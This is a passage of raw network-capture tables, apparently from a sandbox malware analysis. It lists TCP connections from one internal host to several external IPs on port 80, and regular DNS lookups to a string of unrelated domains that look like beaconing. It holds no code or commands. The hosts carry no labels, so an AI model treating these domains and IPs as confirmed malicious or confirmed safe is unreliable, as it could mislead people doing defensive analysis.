                            May 27, 2024 12:22:10.317111015 CEST6319380192.168.2.7160.251.148.118
                            May 27, 2024 12:22:10.319360018 CEST6319380192.168.2.7160.251.148.118
                            May 27, 2024 12:22:10.327148914 CEST8063193160.251.148.118192.168.2.7
                            May 27, 2024 12:22:11.141786098 CEST8063193160.251.148.118192.168.2.7
                            May 27, 2024 12:22:11.141904116 CEST8063193160.251.148.118192.168.2.7
                            May 27, 2024 12:22:11.141959906 CEST6319380192.168.2.7160.251.148.118
                            May 27, 2024 12:22:11.144890070 CEST6319380192.168.2.7160.251.148.118
                            May 27, 2024 12:22:11.149816990 CEST8063193160.251.148.118192.168.2.7
                            May 27, 2024 12:22:16.353753090 CEST6319480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:16.359296083 CEST8063194199.59.243.225192.168.2.7
                            May 27, 2024 12:22:16.359369040 CEST6319480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:16.362613916 CEST6319480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:16.367551088 CEST8063194199.59.243.225192.168.2.7
                            May 27, 2024 12:22:16.816160917 CEST8063194199.59.243.225192.168.2.7
                            May 27, 2024 12:22:16.816322088 CEST8063194199.59.243.225192.168.2.7
                            May 27, 2024 12:22:16.816339016 CEST8063194199.59.243.225192.168.2.7
                            May 27, 2024 12:22:16.816404104 CEST6319480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:16.816404104 CEST6319480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:17.869991064 CEST6319480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:18.887233019 CEST6319580192.168.2.7199.59.243.225
                            May 27, 2024 12:22:18.962599039 CEST8063195199.59.243.225192.168.2.7
                            May 27, 2024 12:22:18.962778091 CEST6319580192.168.2.7199.59.243.225
                            May 27, 2024 12:22:18.969646931 CEST6319580192.168.2.7199.59.243.225
                            May 27, 2024 12:22:18.974566936 CEST8063195199.59.243.225192.168.2.7
                            May 27, 2024 12:22:19.427274942 CEST8063195199.59.243.225192.168.2.7
                            May 27, 2024 12:22:19.427299023 CEST8063195199.59.243.225192.168.2.7
                            May 27, 2024 12:22:19.427376986 CEST8063195199.59.243.225192.168.2.7
                            May 27, 2024 12:22:19.427525997 CEST6319580192.168.2.7199.59.243.225
                            May 27, 2024 12:22:19.427525997 CEST6319580192.168.2.7199.59.243.225
                            May 27, 2024 12:22:20.476833105 CEST6319580192.168.2.7199.59.243.225
                            May 27, 2024 12:22:21.495013952 CEST6319680192.168.2.7199.59.243.225
                            May 27, 2024 12:22:21.501863956 CEST8063196199.59.243.225192.168.2.7
                            May 27, 2024 12:22:21.502232075 CEST6319680192.168.2.7199.59.243.225
                            May 27, 2024 12:22:21.504662037 CEST6319680192.168.2.7199.59.243.225
                            May 27, 2024 12:22:21.512831926 CEST8063196199.59.243.225192.168.2.7
                            May 27, 2024 12:22:21.512891054 CEST8063196199.59.243.225192.168.2.7
                            May 27, 2024 12:22:21.970846891 CEST8063196199.59.243.225192.168.2.7
                            May 27, 2024 12:22:21.970865965 CEST8063196199.59.243.225192.168.2.7
                            May 27, 2024 12:22:21.970881939 CEST8063196199.59.243.225192.168.2.7
                            May 27, 2024 12:22:21.971118927 CEST6319680192.168.2.7199.59.243.225
                            May 27, 2024 12:22:23.007875919 CEST6319680192.168.2.7199.59.243.225
                            May 27, 2024 12:22:24.027365923 CEST6319780192.168.2.7199.59.243.225
                            May 27, 2024 12:22:24.032438993 CEST8063197199.59.243.225192.168.2.7
                            May 27, 2024 12:22:24.034456968 CEST6319780192.168.2.7199.59.243.225
                            May 27, 2024 12:22:24.036463022 CEST6319780192.168.2.7199.59.243.225
                            May 27, 2024 12:22:24.041331053 CEST8063197199.59.243.225192.168.2.7
                            May 27, 2024 12:22:24.515012026 CEST8063197199.59.243.225192.168.2.7
                            May 27, 2024 12:22:24.515049934 CEST8063197199.59.243.225192.168.2.7
                            May 27, 2024 12:22:24.515156984 CEST8063197199.59.243.225192.168.2.7
                            May 27, 2024 12:22:24.515166044 CEST6319780192.168.2.7199.59.243.225
                            May 27, 2024 12:22:24.515219927 CEST6319780192.168.2.7199.59.243.225
                            May 27, 2024 12:22:24.518248081 CEST6319780192.168.2.7199.59.243.225
                            May 27, 2024 12:22:24.523283958 CEST8063197199.59.243.225192.168.2.7
                            May 27, 2024 12:22:39.033458948 CEST6319880192.168.2.7185.31.240.240
                            May 27, 2024 12:22:39.038631916 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.038769960 CEST6319880192.168.2.7185.31.240.240
                            May 27, 2024 12:22:39.040992022 CEST6319880192.168.2.7185.31.240.240
                            May 27, 2024 12:22:39.045942068 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.695900917 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.695919991 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.695933104 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.695944071 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.695977926 CEST6319880192.168.2.7185.31.240.240
                            May 27, 2024 12:22:39.696022034 CEST6319880192.168.2.7185.31.240.240
                            May 27, 2024 12:22:39.700684071 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.700711012 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.700725079 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.700738907 CEST8063198185.31.240.240192.168.2.7
                            May 27, 2024 12:22:39.700754881 CEST6319880192.168.2.7185.31.240.240
                            May 27, 2024 12:22:39.700809956 CEST6319880192.168.2.7185.31.240.240
                            May 27, 2024 12:22:40.554728031 CEST6319880192.168.2.7185.31.240.240
                            May 27, 2024 12:22:41.573662996 CEST6319980192.168.2.7185.31.240.240
                            May 27, 2024 12:22:41.578704119 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:41.578788996 CEST6319980192.168.2.7185.31.240.240
                            May 27, 2024 12:22:41.580988884 CEST6319980192.168.2.7185.31.240.240
                            May 27, 2024 12:22:41.585879087 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:42.241200924 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:42.241220951 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:42.241231918 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:42.241241932 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:42.241252899 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:42.241262913 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:42.241276026 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:42.241281033 CEST6319980192.168.2.7185.31.240.240
                            May 27, 2024 12:22:42.241332054 CEST6319980192.168.2.7185.31.240.240
                            May 27, 2024 12:22:42.241362095 CEST8063199185.31.240.240192.168.2.7
                            May 27, 2024 12:22:42.241401911 CEST6319980192.168.2.7185.31.240.240
                            May 27, 2024 12:22:43.086318970 CEST6319980192.168.2.7185.31.240.240
                            May 27, 2024 12:22:44.104418993 CEST6320080192.168.2.7185.31.240.240
                            May 27, 2024 12:22:44.109482050 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.109600067 CEST6320080192.168.2.7185.31.240.240
                            May 27, 2024 12:22:44.111512899 CEST6320080192.168.2.7185.31.240.240
                            May 27, 2024 12:22:44.116426945 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.116614103 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.754641056 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.754662991 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.754678965 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.754692078 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.754704952 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.754715919 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.754740953 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.754756927 CEST8063200185.31.240.240192.168.2.7
                            May 27, 2024 12:22:44.754770041 CEST6320080192.168.2.7185.31.240.240
                            May 27, 2024 12:22:44.754970074 CEST6320080192.168.2.7185.31.240.240
                            May 27, 2024 12:22:45.617209911 CEST6320080192.168.2.7185.31.240.240
                            May 27, 2024 12:22:46.639245033 CEST6320180192.168.2.7185.31.240.240
                            May 27, 2024 12:22:46.689292908 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:46.695375919 CEST6320180192.168.2.7185.31.240.240
                            May 27, 2024 12:22:46.698255062 CEST6320180192.168.2.7185.31.240.240
                            May 27, 2024 12:22:46.703186035 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358438015 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358457088 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358541012 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358570099 CEST6320180192.168.2.7185.31.240.240
                            May 27, 2024 12:22:47.358587027 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358602047 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358620882 CEST6320180192.168.2.7185.31.240.240
                            May 27, 2024 12:22:47.358644962 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358675003 CEST6320180192.168.2.7185.31.240.240
                            May 27, 2024 12:22:47.358683109 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358691931 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358726025 CEST6320180192.168.2.7185.31.240.240
                            May 27, 2024 12:22:47.358864069 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:47.358900070 CEST6320180192.168.2.7185.31.240.240
                            May 27, 2024 12:22:47.362807989 CEST6320180192.168.2.7185.31.240.240
                            May 27, 2024 12:22:47.367727041 CEST8063201185.31.240.240192.168.2.7
                            May 27, 2024 12:22:52.483144999 CEST6320280192.168.2.7199.59.243.225
                            May 27, 2024 12:22:52.488187075 CEST8063202199.59.243.225192.168.2.7
                            May 27, 2024 12:22:52.488296032 CEST6320280192.168.2.7199.59.243.225
                            May 27, 2024 12:22:52.490180969 CEST6320280192.168.2.7199.59.243.225
                            May 27, 2024 12:22:52.495126009 CEST8063202199.59.243.225192.168.2.7
                            May 27, 2024 12:22:52.945401907 CEST8063202199.59.243.225192.168.2.7
                            May 27, 2024 12:22:52.945430040 CEST8063202199.59.243.225192.168.2.7
                            May 27, 2024 12:22:52.945516109 CEST6320280192.168.2.7199.59.243.225
                            May 27, 2024 12:22:52.945709944 CEST8063202199.59.243.225192.168.2.7
                            May 27, 2024 12:22:52.945763111 CEST6320280192.168.2.7199.59.243.225
                            May 27, 2024 12:22:53.992172003 CEST6320280192.168.2.7199.59.243.225
                            May 27, 2024 12:22:55.011084080 CEST6320380192.168.2.7199.59.243.225
                            May 27, 2024 12:22:55.016110897 CEST8063203199.59.243.225192.168.2.7
                            May 27, 2024 12:22:55.016242027 CEST6320380192.168.2.7199.59.243.225
                            May 27, 2024 12:22:55.019215107 CEST6320380192.168.2.7199.59.243.225
                            May 27, 2024 12:22:55.024116039 CEST8063203199.59.243.225192.168.2.7
                            May 27, 2024 12:22:55.479209900 CEST8063203199.59.243.225192.168.2.7
                            May 27, 2024 12:22:55.479232073 CEST8063203199.59.243.225192.168.2.7
                            May 27, 2024 12:22:55.479242086 CEST8063203199.59.243.225192.168.2.7
                            May 27, 2024 12:22:55.479286909 CEST6320380192.168.2.7199.59.243.225
                            May 27, 2024 12:22:56.523386955 CEST6320380192.168.2.7199.59.243.225
                            May 27, 2024 12:22:57.543385983 CEST6320480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:57.774553061 CEST8063204199.59.243.225192.168.2.7
                            May 27, 2024 12:22:57.774621964 CEST6320480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:57.778562069 CEST6320480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:57.783601999 CEST8063204199.59.243.225192.168.2.7
                            May 27, 2024 12:22:57.783701897 CEST8063204199.59.243.225192.168.2.7
                            May 27, 2024 12:22:58.239726067 CEST8063204199.59.243.225192.168.2.7
                            May 27, 2024 12:22:58.239746094 CEST8063204199.59.243.225192.168.2.7
                            May 27, 2024 12:22:58.239759922 CEST8063204199.59.243.225192.168.2.7
                            May 27, 2024 12:22:58.239810944 CEST6320480192.168.2.7199.59.243.225
                            May 27, 2024 12:22:59.291217089 CEST6320480192.168.2.7199.59.243.225
                            May 27, 2024 12:23:00.308788061 CEST6320580192.168.2.7199.59.243.225
                            May 27, 2024 12:23:00.500220060 CEST8063205199.59.243.225192.168.2.7
                            May 27, 2024 12:23:00.500627041 CEST6320580192.168.2.7199.59.243.225
                            May 27, 2024 12:23:00.502659082 CEST6320580192.168.2.7199.59.243.225
                            May 27, 2024 12:23:00.507658005 CEST8063205199.59.243.225192.168.2.7
                            May 27, 2024 12:23:00.995928049 CEST8063205199.59.243.225192.168.2.7
                            May 27, 2024 12:23:00.995959044 CEST8063205199.59.243.225192.168.2.7
                            May 27, 2024 12:23:00.995980978 CEST8063205199.59.243.225192.168.2.7
                            May 27, 2024 12:23:00.996104002 CEST6320580192.168.2.7199.59.243.225
                            May 27, 2024 12:23:00.996104002 CEST6320580192.168.2.7199.59.243.225
                            May 27, 2024 12:23:00.999195099 CEST6320580192.168.2.7199.59.243.225
                            May 27, 2024 12:23:01.004131079 CEST8063205199.59.243.225192.168.2.7
                            May 27, 2024 12:23:06.043070078 CEST6320680192.168.2.73.33.130.190
                            May 27, 2024 12:23:06.047955036 CEST80632063.33.130.190192.168.2.7
                            May 27, 2024 12:23:06.048022032 CEST6320680192.168.2.73.33.130.190
                            May 27, 2024 12:23:06.049832106 CEST6320680192.168.2.73.33.130.190
                            May 27, 2024 12:23:06.054774046 CEST80632063.33.130.190192.168.2.7
                            May 27, 2024 12:23:06.526554108 CEST80632063.33.130.190192.168.2.7
                            May 27, 2024 12:23:06.530477047 CEST6320680192.168.2.73.33.130.190
                            May 27, 2024 12:23:08.533289909 CEST6320680192.168.2.73.33.130.190
                            May 27, 2024 12:23:08.540128946 CEST80632063.33.130.190192.168.2.7
                            May 27, 2024 12:23:09.543205023 CEST6320780192.168.2.73.33.130.190
                            May 27, 2024 12:23:09.548379898 CEST80632073.33.130.190192.168.2.7
                            May 27, 2024 12:23:09.548463106 CEST6320780192.168.2.73.33.130.190
                            May 27, 2024 12:23:09.550307989 CEST6320780192.168.2.73.33.130.190
                            May 27, 2024 12:23:09.555213928 CEST80632073.33.130.190192.168.2.7
                            May 27, 2024 12:23:10.015681028 CEST80632073.33.130.190192.168.2.7
                            May 27, 2024 12:23:10.015779972 CEST6320780192.168.2.73.33.130.190
                            May 27, 2024 12:23:11.054619074 CEST6320780192.168.2.73.33.130.190
                            May 27, 2024 12:23:11.059654951 CEST80632073.33.130.190192.168.2.7
                            May 27, 2024 12:23:12.074961901 CEST6320880192.168.2.73.33.130.190
                            May 27, 2024 12:23:12.079937935 CEST80632083.33.130.190192.168.2.7
                            May 27, 2024 12:23:12.080018044 CEST6320880192.168.2.73.33.130.190
                            May 27, 2024 12:23:12.082437038 CEST6320880192.168.2.73.33.130.190
                            May 27, 2024 12:23:12.087344885 CEST80632083.33.130.190192.168.2.7
                            May 27, 2024 12:23:12.087488890 CEST80632083.33.130.190192.168.2.7
                            May 27, 2024 12:23:12.540066957 CEST80632083.33.130.190192.168.2.7
                            May 27, 2024 12:23:12.542629004 CEST6320880192.168.2.73.33.130.190
                            May 27, 2024 12:23:13.585941076 CEST6320880192.168.2.73.33.130.190
                            May 27, 2024 12:23:13.592608929 CEST80632083.33.130.190192.168.2.7
                            May 27, 2024 12:23:14.604607105 CEST6320980192.168.2.73.33.130.190
                            May 27, 2024 12:23:14.610436916 CEST80632093.33.130.190192.168.2.7
                            May 27, 2024 12:23:14.610521078 CEST6320980192.168.2.73.33.130.190
                            May 27, 2024 12:23:14.615155935 CEST6320980192.168.2.73.33.130.190
                            May 27, 2024 12:23:14.620085001 CEST80632093.33.130.190192.168.2.7
                            May 27, 2024 12:23:15.085428953 CEST80632093.33.130.190192.168.2.7
                            May 27, 2024 12:23:15.085705996 CEST80632093.33.130.190192.168.2.7
                            May 27, 2024 12:23:15.087239027 CEST6320980192.168.2.73.33.130.190
                            May 27, 2024 12:23:15.091166019 CEST6320980192.168.2.73.33.130.190
                            May 27, 2024 12:23:15.096004009 CEST80632093.33.130.190192.168.2.7
                            May 27, 2024 12:23:20.170393944 CEST6321080192.168.2.791.195.240.92
                            May 27, 2024 12:23:20.175456047 CEST806321091.195.240.92192.168.2.7
                            May 27, 2024 12:23:20.175566912 CEST6321080192.168.2.791.195.240.92
                            May 27, 2024 12:23:20.177505016 CEST6321080192.168.2.791.195.240.92
                            May 27, 2024 12:23:20.182472944 CEST806321091.195.240.92192.168.2.7
                            May 27, 2024 12:23:20.821274996 CEST806321091.195.240.92192.168.2.7
                            May 27, 2024 12:23:20.821315050 CEST806321091.195.240.92192.168.2.7
                            May 27, 2024 12:23:20.821415901 CEST6321080192.168.2.791.195.240.92
                            May 27, 2024 12:23:21.679784060 CEST6321080192.168.2.791.195.240.92
                            May 27, 2024 12:23:22.698503017 CEST6321180192.168.2.791.195.240.92
                            May 27, 2024 12:23:22.709763050 CEST806321191.195.240.92192.168.2.7
                            May 27, 2024 12:23:22.710064888 CEST6321180192.168.2.791.195.240.92
                            May 27, 2024 12:23:22.712028027 CEST6321180192.168.2.791.195.240.92
                            May 27, 2024 12:23:22.716928959 CEST806321191.195.240.92192.168.2.7
                            May 27, 2024 12:23:23.357072115 CEST806321191.195.240.92192.168.2.7
                            May 27, 2024 12:23:23.357206106 CEST806321191.195.240.92192.168.2.7
                            May 27, 2024 12:23:23.363234997 CEST6321180192.168.2.791.195.240.92
                            May 27, 2024 12:23:23.658021927 CEST806321191.195.240.92192.168.2.7
                            May 27, 2024 12:23:23.658077955 CEST6321180192.168.2.791.195.240.92
                            May 27, 2024 12:23:23.660245895 CEST806321191.195.240.92192.168.2.7
                            May 27, 2024 12:23:23.660291910 CEST6321180192.168.2.791.195.240.92
                            May 27, 2024 12:23:24.226922989 CEST6321180192.168.2.791.195.240.92
                            May 27, 2024 12:23:26.725564957 CEST6321280192.168.2.791.195.240.92
                            May 27, 2024 12:23:26.730756998 CEST806321291.195.240.92192.168.2.7
                            May 27, 2024 12:23:26.730887890 CEST6321280192.168.2.791.195.240.92
                            May 27, 2024 12:23:26.732769012 CEST6321280192.168.2.791.195.240.92
                            May 27, 2024 12:23:26.737899065 CEST806321291.195.240.92192.168.2.7
                            May 27, 2024 12:23:26.738089085 CEST806321291.195.240.92192.168.2.7
                            May 27, 2024 12:23:27.369196892 CEST806321291.195.240.92192.168.2.7
                            May 27, 2024 12:23:27.370095968 CEST806321291.195.240.92192.168.2.7
                            May 27, 2024 12:23:27.370280027 CEST6321280192.168.2.791.195.240.92
                            May 27, 2024 12:23:28.242166042 CEST6321280192.168.2.791.195.240.92
                            May 27, 2024 12:23:29.260341883 CEST6321380192.168.2.791.195.240.92
                            May 27, 2024 12:23:29.265410900 CEST806321391.195.240.92192.168.2.7
                            May 27, 2024 12:23:29.265516996 CEST6321380192.168.2.791.195.240.92
                            May 27, 2024 12:23:29.267343044 CEST6321380192.168.2.791.195.240.92
                            May 27, 2024 12:23:29.272258997 CEST806321391.195.240.92192.168.2.7
                            May 27, 2024 12:23:29.914674997 CEST806321391.195.240.92192.168.2.7
                            May 27, 2024 12:23:29.914782047 CEST806321391.195.240.92192.168.2.7
                            May 27, 2024 12:23:29.914848089 CEST6321380192.168.2.791.195.240.92
                            May 27, 2024 12:23:29.917582035 CEST6321380192.168.2.791.195.240.92
                            May 27, 2024 12:23:29.922442913 CEST806321391.195.240.92192.168.2.7
                            May 27, 2024 12:23:34.946526051 CEST6321480192.168.2.738.47.207.149
                            May 27, 2024 12:23:34.951478958 CEST806321438.47.207.149192.168.2.7
                            May 27, 2024 12:23:34.951668978 CEST6321480192.168.2.738.47.207.149
                            May 27, 2024 12:23:34.953430891 CEST6321480192.168.2.738.47.207.149
                            May 27, 2024 12:23:34.958359957 CEST806321438.47.207.149192.168.2.7
                            May 27, 2024 12:23:35.859523058 CEST806321438.47.207.149192.168.2.7
                            May 27, 2024 12:23:35.859548092 CEST806321438.47.207.149192.168.2.7
                            May 27, 2024 12:23:35.859617949 CEST6321480192.168.2.738.47.207.149
                            May 27, 2024 12:23:36.460874081 CEST6321480192.168.2.738.47.207.149
                            May 27, 2024 12:23:37.480360031 CEST6321580192.168.2.738.47.207.149
                            May 27, 2024 12:23:37.485328913 CEST806321538.47.207.149192.168.2.7
                            May 27, 2024 12:23:37.485395908 CEST6321580192.168.2.738.47.207.149
                            May 27, 2024 12:23:37.487536907 CEST6321580192.168.2.738.47.207.149
                            May 27, 2024 12:23:37.492460012 CEST806321538.47.207.149192.168.2.7
                            May 27, 2024 12:23:38.393469095 CEST806321538.47.207.149192.168.2.7
                            May 27, 2024 12:23:38.393604994 CEST806321538.47.207.149192.168.2.7
                            May 27, 2024 12:23:38.393641949 CEST6321580192.168.2.738.47.207.149
                            May 27, 2024 12:23:38.992242098 CEST6321580192.168.2.738.47.207.149
                            May 27, 2024 12:23:40.012388945 CEST6321680192.168.2.738.47.207.149
                            May 27, 2024 12:23:40.017405987 CEST806321638.47.207.149192.168.2.7
                            May 27, 2024 12:23:40.017474890 CEST6321680192.168.2.738.47.207.149
                            May 27, 2024 12:23:40.021313906 CEST6321680192.168.2.738.47.207.149
                            May 27, 2024 12:23:40.026422024 CEST806321638.47.207.149192.168.2.7
                            May 27, 2024 12:23:40.026451111 CEST806321638.47.207.149192.168.2.7
                            May 27, 2024 12:23:40.924274921 CEST806321638.47.207.149192.168.2.7
                            May 27, 2024 12:23:40.924308062 CEST806321638.47.207.149192.168.2.7
                            May 27, 2024 12:23:40.926546097 CEST6321680192.168.2.738.47.207.149
                            May 27, 2024 12:23:41.523354053 CEST6321680192.168.2.738.47.207.149
                            May 27, 2024 12:23:42.944694996 CEST6321780192.168.2.738.47.207.149
                            May 27, 2024 12:23:42.949956894 CEST806321738.47.207.149192.168.2.7
                            May 27, 2024 12:23:42.950102091 CEST6321780192.168.2.738.47.207.149
                            May 27, 2024 12:23:42.952230930 CEST6321780192.168.2.738.47.207.149
                            May 27, 2024 12:23:42.957230091 CEST806321738.47.207.149192.168.2.7
                            May 27, 2024 12:23:43.841264963 CEST806321738.47.207.149192.168.2.7
                            May 27, 2024 12:23:43.841428995 CEST806321738.47.207.149192.168.2.7
                            May 27, 2024 12:23:43.841506004 CEST6321780192.168.2.738.47.207.149
                            May 27, 2024 12:23:44.809151888 CEST6321780192.168.2.738.47.207.149
                            May 27, 2024 12:23:44.814595938 CEST806321738.47.207.149192.168.2.7
                            TimestampSource PortDest PortSource IPDest IP
                            May 27, 2024 12:20:00.171402931 CEST53566871.1.1.1192.168.2.7
                            May 27, 2024 12:20:08.775738955 CEST5992253192.168.2.71.1.1.1
                            May 27, 2024 12:20:08.813746929 CEST53599221.1.1.1192.168.2.7
                            May 27, 2024 12:20:24.511812925 CEST5910453192.168.2.71.1.1.1
                            May 27, 2024 12:20:24.690995932 CEST53591041.1.1.1192.168.2.7
                            May 27, 2024 12:20:38.403372049 CEST6030453192.168.2.71.1.1.1
                            May 27, 2024 12:20:38.416935921 CEST53603041.1.1.1192.168.2.7
                            May 27, 2024 12:20:51.534323931 CEST5368153192.168.2.71.1.1.1
                            May 27, 2024 12:20:51.732665062 CEST53536811.1.1.1192.168.2.7
                            May 27, 2024 12:21:04.840253115 CEST6263153192.168.2.71.1.1.1
                            May 27, 2024 12:21:04.886538982 CEST53626311.1.1.1192.168.2.7
                            May 27, 2024 12:21:20.027914047 CEST5139053192.168.2.71.1.1.1
                            May 27, 2024 12:21:20.226238012 CEST53513901.1.1.1192.168.2.7
                            May 27, 2024 12:21:34.934665918 CEST5900553192.168.2.71.1.1.1
                            May 27, 2024 12:21:34.980176926 CEST53590051.1.1.1192.168.2.7
                            May 27, 2024 12:21:48.700105906 CEST5291353192.168.2.71.1.1.1
                            May 27, 2024 12:21:48.718168974 CEST53529131.1.1.1192.168.2.7
                            May 27, 2024 12:22:02.045412064 CEST5298753192.168.2.71.1.1.1
                            May 27, 2024 12:22:02.696774960 CEST53529871.1.1.1192.168.2.7
                            May 27, 2024 12:22:16.152982950 CEST6534353192.168.2.71.1.1.1
                            May 27, 2024 12:22:16.349999905 CEST53653431.1.1.1192.168.2.7
                            May 27, 2024 12:22:29.527311087 CEST5904953192.168.2.71.1.1.1
                            May 27, 2024 12:22:29.536874056 CEST53590491.1.1.1192.168.2.7
                            May 27, 2024 12:22:38.933196068 CEST5149453192.168.2.71.1.1.1
                            May 27, 2024 12:22:39.030888081 CEST53514941.1.1.1192.168.2.7
                            May 27, 2024 12:22:52.370800018 CEST5609553192.168.2.71.1.1.1
                            May 27, 2024 12:22:52.479981899 CEST53560951.1.1.1192.168.2.7
                            May 27, 2024 12:23:06.024713993 CEST6496353192.168.2.71.1.1.1
                            May 27, 2024 12:23:06.040009975 CEST53649631.1.1.1192.168.2.7
                            May 27, 2024 12:23:20.104852915 CEST5483453192.168.2.71.1.1.1
                            May 27, 2024 12:23:20.167999983 CEST53548341.1.1.1192.168.2.7
                            May 27, 2024 12:23:34.933322906 CEST5535853192.168.2.71.1.1.1
                            May 27, 2024 12:23:34.943599939 CEST53553581.1.1.1192.168.2.7
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            May 27, 2024 12:20:08.775738955 CEST192.168.2.71.1.1.10xa025Standard query (0)www.batchscraper.comA (IP address)IN (0x0001)false
                            May 27, 2024 12:20:24.511812925 CEST192.168.2.71.1.1.10x9cf9Standard query (0)www.auronhouse.comA (IP address)IN (0x0001)false
                            May 27, 2024 12:20:38.403372049 CEST192.168.2.71.1.1.10x933eStandard query (0)www.ukscan.co.ukA (IP address)IN (0x0001)false
                            May 27, 2024 12:20:51.534323931 CEST192.168.2.71.1.1.10x6f32Standard query (0)www.swordshoop.caA (IP address)IN (0x0001)false
                            May 27, 2024 12:21:04.840253115 CEST192.168.2.71.1.1.10x7d93Standard query (0)www.fruitique.co.ukA (IP address)IN (0x0001)false
                            May 27, 2024 12:21:20.027914047 CEST192.168.2.71.1.1.10xd48Standard query (0)www.gamemaster.atA (IP address)IN (0x0001)false
                            May 27, 2024 12:21:34.934665918 CEST192.168.2.71.1.1.10x74Standard query (0)www.annahaywardva.co.ukA (IP address)IN (0x0001)false
                            May 27, 2024 12:21:48.700105906 CEST192.168.2.71.1.1.10x47faStandard query (0)www.ziontool.xyzA (IP address)IN (0x0001)false
                            May 27, 2024 12:22:02.045412064 CEST192.168.2.71.1.1.10x2727Standard query (0)www.busypro.netA (IP address)IN (0x0001)false
                            May 27, 2024 12:22:16.152982950 CEST192.168.2.71.1.1.10xf264Standard query (0)www.performacetoyota.caA (IP address)IN (0x0001)false
                            May 27, 2024 12:22:29.527311087 CEST192.168.2.71.1.1.10xbb85Standard query (0)www.digishieldu.onlineA (IP address)IN (0x0001)false
                            May 27, 2024 12:22:38.933196068 CEST192.168.2.71.1.1.10x1f5dStandard query (0)www.pricekaboom.comA (IP address)IN (0x0001)false
                            May 27, 2024 12:22:52.370800018 CEST192.168.2.71.1.1.10x325eStandard query (0)www.drapples.clubA (IP address)IN (0x0001)false
                            May 27, 2024 12:23:06.024713993 CEST192.168.2.71.1.1.10x1659Standard query (0)www.autonomyai.xyzA (IP address)IN (0x0001)false
                            May 27, 2024 12:23:20.104852915 CEST192.168.2.71.1.1.10xd689Standard query (0)www.pharmacielorraine.frA (IP address)IN (0x0001)false
                            May 27, 2024 12:23:34.933322906 CEST192.168.2.71.1.1.10x7b61Standard query (0)www.y94hr.topA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            May 27, 2024 12:20:08.813746929 CEST1.1.1.1192.168.2.70xa025No error (0)www.batchscraper.com172.67.190.203A (IP address)IN (0x0001)false
                            May 27, 2024 12:20:08.813746929 CEST1.1.1.1192.168.2.70xa025No error (0)www.batchscraper.com104.21.10.192A (IP address)IN (0x0001)false
                            May 27, 2024 12:20:24.690995932 CEST1.1.1.1192.168.2.70x9cf9No error (0)www.auronhouse.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                            May 27, 2024 12:20:24.690995932 CEST1.1.1.1192.168.2.70x9cf9No error (0)ghs.googlehosted.com142.250.186.51A (IP address)IN (0x0001)false
                            May 27, 2024 12:20:38.416935921 CEST1.1.1.1192.168.2.70x933eNo error (0)www.ukscan.co.ukukscan.co.ukCNAME (Canonical name)IN (0x0001)false
                            May 27, 2024 12:20:38.416935921 CEST1.1.1.1192.168.2.70x933eNo error (0)ukscan.co.uk3.33.130.190A (IP address)IN (0x0001)false
                            May 27, 2024 12:20:38.416935921 CEST1.1.1.1192.168.2.70x933eNo error (0)ukscan.co.uk15.197.148.33A (IP address)IN (0x0001)false
                            May 27, 2024 12:20:51.732665062 CEST1.1.1.1192.168.2.70x6f32No error (0)www.swordshoop.ca199.59.243.225A (IP address)IN (0x0001)false
